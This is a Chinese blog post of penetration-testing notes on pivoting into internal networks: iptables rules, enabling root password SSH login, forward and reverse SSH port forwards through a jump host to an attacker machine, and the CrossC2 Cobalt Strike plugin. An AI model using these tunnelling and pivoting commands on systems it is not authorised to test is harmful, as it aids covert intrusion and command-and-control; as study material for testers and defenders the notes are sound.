dns和ssh上线和通讯

本文介绍了SSH隧道的配置和使用,包括如何通过iptables设置允许SSH连接,并利用SSH进行内网穿透。内容涉及DNS区域传输、域名解析协议和ICMP的区别,以及如何通过跳板机实现正向和反向连接,从而进行远程控制和内网渗透。同时提到了CrossC2插件,用于支持Linux、Mac、iOS和Android系统的上线操作。
摘要由CSDN通过智能技术生成

上线是指后续的渗透,通讯只能进行上网,不能做其他事

dns区域传输是tcp协议,域名解析用udp协议,也就是说防火我禁止所有的tcp的时候,还是能通过nslookup进行传输

ns记录是专门域名解析的设置

icmp是出站

ssh隧道&通讯

由于cs没有ssh协议监听,没办法上线,由于ssh协议存在于linux系统,所以跳板机必须是linux

iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */

开启ssh协议登录,最后输入的密码是指攻击机的密码

vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

本地:出站封----使用正向连接,将1.15的8080端口放到1.166的1122端口,然后攻击机连接跳板机,就直接能访问内网

 

跳板机:ssh -CfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
攻击机:curl http://127.0.0.1:1122

远程:入站封----使用发向连接,将1.15的8080端口直接映射到攻击机的1234端口,攻击机直接访问

ssh -CfNg -R 1234:192.168.1.15:8080 root@47.94.236.117
curl http://127.0.0.1:1234

控制上线-插件-Linux&Mac&IOS&Android

https://github.com/gloxec/CrossC2

面向Linux Mac IOS Android系统上线支持

1、插件使用

2、命令使用

使用参考:https://gloxec.github.io/CrossC2/zh_cn/

通过插件,可以直接用cs进行各类操作系统的内网渗透

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值